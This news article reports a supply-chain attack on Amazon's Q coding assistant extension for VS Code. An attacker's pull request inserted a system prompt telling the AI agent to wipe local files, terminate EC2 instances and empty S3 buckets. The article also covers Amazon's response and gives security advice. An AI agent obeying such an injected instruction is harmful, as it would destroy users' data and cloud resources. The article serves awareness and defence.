In a significant security breach, a hacker successfully infiltrated Amazon’s AI-powered coding assistant, Q, by injecting malicious code designed to erase users’ local files and cloud resources. This unauthorized code was incorporated into version 1.84.0 of the Amazon Q extension for Visual Studio Code, which was subsequently released to the public.
The Breach and Its Mechanism
The attacker submitted a pull request to Amazon’s GitHub repository using an unprivileged account. Surprisingly, this request was approved, granting the hacker administrative access. On July 13, the malicious code was added, and by July 17, Amazon had released the compromised version without detecting the intrusion. The injected code included a system prompt instructing the AI agent to restore the system to a near-factory state and delete file-system and cloud resources. This directive encompassed commands to terminate EC2 instances and empty S3 buckets, posing a severe risk to users’ data and cloud infrastructure.
Amazon’s Response and Mitigation Efforts
Upon discovering the breach, Amazon promptly removed version 1.84.0 from the Visual Studio Marketplace and released a patched version, 1.85.0, without issuing a public advisory. The company stated, Security is our top priority. We quickly mitigated an attempt to exploit a known issue in two open-source repositories… and confirmed that no customer resources were impacted. Amazon also revoked the attacker’s credentials to prevent further unauthorized access.
Implications for AI Development Tools
This incident underscores the growing vulnerabilities associated with integrating AI tools into development environments. As AI agents are granted permissions to execute shell commands and access cloud credentials, they become attractive targets for adversaries. Security experts warn that prompt-based tampering could become a favored method for attackers seeking to exploit such tools.
Recommendations for Users
Users of Amazon Q are advised to update to the latest version immediately, audit their extension histories, and restrict agent privileges to mitigate potential risks. The next injected prompt may not be as defective by design, making proactive measures essential.